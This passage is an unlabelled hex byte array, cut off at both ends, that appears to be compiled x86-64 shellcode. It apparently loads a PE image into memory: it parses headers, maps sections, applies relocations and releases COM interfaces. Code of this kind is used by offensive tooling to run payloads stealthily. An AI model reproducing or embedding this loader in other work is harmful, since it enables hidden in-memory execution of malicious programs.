885 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84,
886 0x85, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48,
887 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x88, 0x88, 0x00, 0x00,
888 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x30,
889 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48,
890 0x8b, 0x95, 0xc8, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1,
891 0x41, 0xff, 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4,
892 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x1d, 0x02, 0x00, 0x00, 0x48, 0xc7,
893 0x85, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
894 0x08, 0x03, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84,
895 0xc0, 0x0f, 0x84, 0x4a, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x03,
896 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xf0,
897 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03, 0x00,
898 0x00, 0xe8, 0x67, 0xe1, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00,
899 0x00, 0x4c, 0x8b, 0x80, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xec,
900 0x48, 0x8d, 0x45, 0xf0, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48, 0x89,
901 0x85, 0xb8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
902 0x48, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x41, 0x89,
903 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff,
904 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xd8,
905 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xcf, 0x00, 0x00, 0x00, 0xc7, 0x85,
906 0x0c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xaf, 0x00, 0x00,
907 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08,
908 0x01, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48,
909 0x8d, 0x0c, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x02,
910 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff,
911 0xd2, 0x48, 0x89, 0x85, 0x98, 0x02, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x90,
912 0x02, 0x00, 0x00, 0x08, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
913 0x4c, 0x8b, 0x88, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x02,
914 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
915 0xd8, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff,
916 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00,
917 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48,
918 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x02, 0x00,
919 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0xc7, 0x85, 0xd8, 0x02, 0x00,
920 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x83,
921 0xc0, 0x01, 0x89, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x85, 0x0c, 0x02,
922 0x00, 0x00, 0x8b, 0x55, 0xec, 0x39, 0xd0, 0x0f, 0x82, 0x40, 0xff, 0xff,
923 0xff, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xa5, 0x00,
924 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40,
925 0x30, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x90, 0xc8, 0x01, 0x00, 0x00, 0x48,
926 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x48, 0x30, 0x48, 0x8b,
927 0x85, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x38, 0x02, 0x00, 0x00,
928 0x48, 0x89, 0x45, 0xc0, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x85, 0x40,
929 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x02,
930 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0x02, 0x00, 0x00, 0x48, 0x89, 0x54,
931 0x24, 0x30, 0x48, 0x8b, 0x95, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x89, 0x54,
932 0x24, 0x28, 0x48, 0x8d, 0x55, 0xc0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41,
933 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x18, 0x01, 0x00, 0x00, 0x48,
934 0x89, 0xc2, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x48,
935 0x83, 0xbd, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48, 0x8b, 0x85,
936 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48,
937 0x8b, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48,
938 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00,
939 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff,
940 0xd2, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10,
941 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x89,
942 0xc1, 0xff, 0xd2, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x68,
943 0x03, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
944 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b,
945 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48,
946 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
947 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x89,
948 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7,
949 0x40, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
950 0x40, 0x38, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48,
951 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b,
952 0x45, 0x18, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89,
953 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00,
954 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85,
955 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48,
956 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
957 0x40, 0x28, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b,
958 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
959 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0, 0x74, 0x75, 0x48,
960 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
961 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x50,
962 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1,
963 0x41, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
964 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x58, 0x48, 0x8b, 0x45,
965 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45,
966 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00,
967 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10,
968 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18,
969 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
970 0x48, 0x8b, 0x40, 0x20, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45,
971 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10,
972 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x89, 0xc1, 0xff,
973 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x20,
974 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18,
975 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
976 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18,
977 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc,
978 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, 0x00,
979 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74,
980 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00,
981 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08,
982 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18,
983 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
984 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18,
985 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b,
986 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45,
987 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00,
988 0x90, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x57, 0x56, 0x48, 0x81,
989 0xec, 0x70, 0x05, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00,
990 0x00, 0x48, 0x89, 0x8d, 0x10, 0x05, 0x00, 0x00, 0x48, 0x89, 0x95, 0x18,
991 0x05, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x00,
992 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb0, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00,
993 0x00, 0x48, 0xc7, 0x85, 0x98, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
994 0x48, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x68,
995 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x48,
996 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x90, 0x04, 0x00,
997 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05, 0x28, 0x05,
998 0x00, 0x00, 0x48, 0x89, 0x85, 0x88, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
999 0x88, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x04, 0x00, 0x00, 0x48,
1000 0x8b, 0x85, 0x80, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0,
1001 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1002 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00,
1003 0x48, 0x8b, 0x40, 0x40, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
1004 0x89, 0x85, 0x70, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x04, 0x00,
1005 0x00, 0x48, 0x89, 0x85, 0x68, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x68,
1006 0x04, 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85,
1007 0x70, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x60, 0x04,
1008 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x50,
1009 0x04, 0x48, 0x8b, 0x85, 0x60, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04,
1010 0x66, 0x39, 0xc2, 0x0f, 0x85, 0x84, 0x14, 0x00, 0x00, 0x48, 0x8b, 0x85,
1011 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x50, 0x89, 0xc0, 0x48, 0x89, 0x45,
1012 0x78, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x80, 0xb4, 0x00,
1013 0x00, 0x00, 0x89, 0x85, 0x5c, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x5c, 0x04,
1014 0x00, 0x00, 0x00, 0x0f, 0x95, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x58,
1015 0x04, 0x00, 0x00, 0x83, 0xbd, 0x58, 0x04, 0x00, 0x00, 0x00, 0x75, 0x0f,
1016 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48,
1017 0x89, 0x45, 0x70, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6,
1018 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x5e, 0x48, 0x8d, 0x4d,
1019 0x78, 0x48, 0x8d, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90,
1020 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0xc7, 0x44, 0x24,
1021 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
1022 0x08, 0xc7, 0x44, 0x24, 0x20, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9,
1023 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x1f, 0x00, 0x0f, 0x00, 0x48,
1024 0x89, 0xc1, 0xe8, 0xca, 0x3b, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1025 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x89, 0x57, 0x01,
1026 0x00, 0x00, 0xe9, 0xf1, 0x13, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05,
1027 0x00, 0x00, 0x4c, 0x8b, 0x80, 0xb0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1028 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x90, 0xfb, 0x05, 0x00, 0x00, 0x48,
1029 0x8d, 0x45, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0xc7, 0x45, 0xe0,
1030 0x30, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00,
1031 0xc7, 0x45, 0xf8, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x48,
1032 0x89, 0x45, 0xf0, 0x48, 0xc7, 0x45, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
1033 0xc7, 0x45, 0x08, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x20, 0x48,
1034 0x8d, 0x4d, 0xe0, 0x48, 0x8d, 0x45, 0x38, 0x48, 0x8b, 0x95, 0x90, 0x04,
1035 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x58, 0xc7, 0x44, 0x24, 0x50, 0x00,
1036 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00,
1037 0xc7, 0x44, 0x24, 0x40, 0x40, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
1038 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x01, 0x00, 0x00, 0x00,
1039 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
1040 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba,
1041 0x00, 0x00, 0x00, 0x80, 0x48, 0x89, 0xc1, 0xe8, 0xa7, 0x3c, 0x00, 0x00,
1042 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00,
1043 0x00, 0x0f, 0x88, 0xfd, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48,
1044 0x83, 0xf8, 0xff, 0x0f, 0x84, 0xef, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45,
1045 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe2, 0x12, 0x00, 0x00, 0x48, 0x8b,
1046 0x55, 0x38, 0x48, 0x8d, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
1047 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x4c, 0x24, 0x38, 0x48, 0x89, 0x54,
1048 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x01, 0xc7, 0x44,
1049 0x24, 0x20, 0x02, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
1050 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x1f, 0x00, 0x0f, 0x00, 0x48,
1051 0x89, 0xc1, 0xe8, 0x86, 0x3a, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1052 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00,
1053 0x48, 0x89, 0xc1, 0xe8, 0x19, 0x3b, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1054 0x00, 0x00, 0x00, 0x0f, 0x88, 0x7a, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x85,
1055 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x70, 0x48, 0x8b, 0x95, 0x90,
1056 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24, 0x48,
1057 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00,
1058 0xc7, 0x44, 0x24, 0x38, 0x02, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0x68,
1059 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
1060 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
1061 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc2, 0xff,
1062 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x2a, 0x3a, 0x00, 0x00, 0x89,
1063 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00,
1064 0x0f, 0x88, 0x08, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x85,
1065 0xc0, 0x0f, 0x84, 0xfe, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05,
1066 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x74,
1067 0x5b, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45,
1068 0x68, 0x48, 0x89, 0x45, 0x58, 0x48, 0x8d, 0x4d, 0x58, 0x48, 0x8d, 0x45,
1069 0x60, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1070 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1071 0x20, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89,
1072 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x84, 0x3a, 0x00,
1073 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00,
1074 0x00, 0x00, 0x0f, 0x88, 0x94, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
1075 0x04, 0x00, 0x00, 0x8b, 0x48, 0x54, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x8b,
1076 0x95, 0x88, 0x04, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8,
1077 0x90, 0x32, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x0f,
1078 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00,
1079 0x00, 0x48, 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0x48,
1080 0x04, 0x00, 0x00, 0xc7, 0x85, 0xac, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00,
1081 0x00, 0xe9, 0x91, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00,
1082 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1,
1083 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48, 0x04, 0x00, 0x00,
1084 0x48, 0x01, 0xd0, 0x44, 0x8b, 0x40, 0x10, 0x8b, 0x95, 0xac, 0x04, 0x00,
1085 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
1086 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48, 0x04, 0x00,
1087 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1088 0x88, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x4c, 0x8b, 0x4d, 0x70, 0x8b,
1089 0x8d, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc8, 0x48, 0xc1, 0xe0, 0x02,
1090 0x48, 0x01, 0xc8, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc1, 0x48, 0x8b,
1091 0x85, 0x48, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x0c, 0x89,
1092 0xc0, 0x4c, 0x01, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xd4, 0x31, 0x00, 0x00,
1093 0x83, 0x85, 0xac, 0x04, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x78, 0x04,
1094 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xac,
1095 0x04, 0x00, 0x00, 0x0f, 0x82, 0x55, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x55,
1096 0x70, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30,
1097 0x48, 0xf7, 0xd8, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x04, 0x00,
1098 0x00, 0x83, 0xbd, 0x58, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x06, 0x02,
1099 0x00, 0x00, 0x48, 0x83, 0xbd, 0x40, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84,
1100 0xf8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1101 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00, 0x00, 0x8b,
1102 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1103 0x48, 0x89, 0x85, 0xb8, 0x04, 0x00, 0x00, 0xe9, 0x9b, 0x01, 0x00, 0x00,
1104 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48,
1105 0x89, 0x85, 0xc0, 0x04, 0x00, 0x00, 0xe9, 0x53, 0x01, 0x00, 0x00, 0x48,
1106 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0xc0,
1107 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7,
1108 0xc0, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40,
1109 0x50, 0x39, 0xc2, 0x0f, 0x83, 0x1d, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
1110 0x70, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc1,
1111 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25,
1112 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc8, 0x48, 0x01, 0xd0, 0x48,
1113 0x89, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
